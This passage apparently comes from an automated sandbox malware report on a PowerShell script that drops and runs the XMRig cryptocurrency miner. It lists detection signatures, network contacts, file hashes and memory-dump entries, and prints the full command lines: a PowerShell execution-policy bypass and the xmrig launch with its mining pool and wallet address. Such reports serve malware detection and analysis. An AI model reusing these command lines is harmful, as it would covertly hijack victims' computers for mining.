memory/532-103-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-104-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-105-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-106-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-107-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-108-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-109-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-110-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-111-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-112-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-113-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-114-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-115-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-116-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-117-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-118-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:05
Platform
win10-20240404-en
Max time kernel
1791s
Max time network
1755s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 612 wrote to memory of 4532 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 612 wrote to memory of 4532 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.107.17.2.in-addr.arpa | udp |
Files
memory/612-4-0x00007FFA76483000-0x00007FFA76484000-memory.dmp
memory/612-5-0x00000290CC000000-0x00000290CC022000-memory.dmp
memory/612-6-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmp
memory/612-10-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmp
memory/612-9-0x00000290CC1B0000-0x00000290CC226000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4qbxt3eh.3h1.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/612-26-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmp
memory/612-49-0x00000290CC190000-0x00000290CC1A2000-memory.dmp
memory/612-62-0x00000290CC170000-0x00000290CC17A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4532-91-0x0000020579660000-0x0000020579680000-memory.dmp
memory/4532-92-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-93-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/612-94-0x00007FFA76483000-0x00007FFA76484000-memory.dmp
memory/612-95-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmp
memory/4532-96-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-97-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-98-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-99-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-100-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-101-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-102-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-103-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-104-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-105-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-106-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-107-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-108-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-109-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-110-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-111-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-112-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-113-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-114-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-115-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-116-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-117-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-118-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-119-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-120-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-121-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-122-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-123-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-124-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-125-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-126-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-127-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-128-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-129-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-130-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-131-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-132-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-133-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-134-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-135-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-136-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-137-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-138-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-139-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-140-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-141-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-142-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-143-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-144-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-145-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-146-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-147-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-148-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-149-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-150-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-151-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-152-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-153-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-154-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-155-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-156-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:14
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4560 wrote to memory of 4988 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4560 wrote to memory of 4988 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4208,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=4088 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4072,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=4064 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.167.79.40.in-addr.arpa | udp |
Files
memory/4560-0-0x00007FFC06943000-0x00007FFC06945000-memory.dmp
memory/4560-1-0x000001DDFE840000-0x000001DDFE862000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3zqb21yt.tmx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4560-11-0x00007FFC06940000-0x00007FFC07401000-memory.dmp
memory/4560-12-0x00007FFC06940000-0x00007FFC07401000-memory.dmp
memory/4560-14-0x00007FFC06940000-0x00007FFC07401000-memory.dmp
memory/4560-15-0x000001DDFCB60000-0x000001DDFCB72000-memory.dmp
memory/4560-16-0x000001DDFCB50000-0x000001DDFCB5A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4988-47-0x0000012E47130000-0x0000012E47150000-memory.dmp
memory/4988-48-0x0000012E48940000-0x0000012E48960000-memory.dmp
memory/4988-49-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-50-0x0000012E48960000-0x0000012E48980000-memory.dmp
memory/4988-51-0x0000012E48980000-0x0000012E489A0000-memory.dmp
memory/4988-52-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4560-53-0x00007FFC06943000-0x00007FFC06945000-memory.dmp
memory/4560-54-0x00007FFC06940000-0x00007FFC07401000-memory.dmp
memory/4988-55-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-56-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-58-0x0000012E48980000-0x0000012E489A0000-memory.dmp
memory/4988-57-0x0000012E48960000-0x0000012E48980000-memory.dmp
memory/4988-59-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-60-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-61-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-62-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-63-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-64-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-65-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-66-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-67-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-68-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-69-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-70-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-71-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-72-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-73-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-74-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-75-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-76-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-77-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-78-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-79-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-80-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-81-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-82-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-83-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-84-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-85-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-86-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-87-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-88-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-89-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-90-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-91-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-92-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-93-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-94-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-95-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-96-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-97-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-98-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-99-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-100-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-101-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-102-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-103-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-104-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-105-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-106-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-107-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-108-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-109-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-110-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-111-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-112-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-113-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-114-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-115-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-116-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
memory/4988-117-0x00007FF6260F0000-0x00007FF626D23000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:05
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1779s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
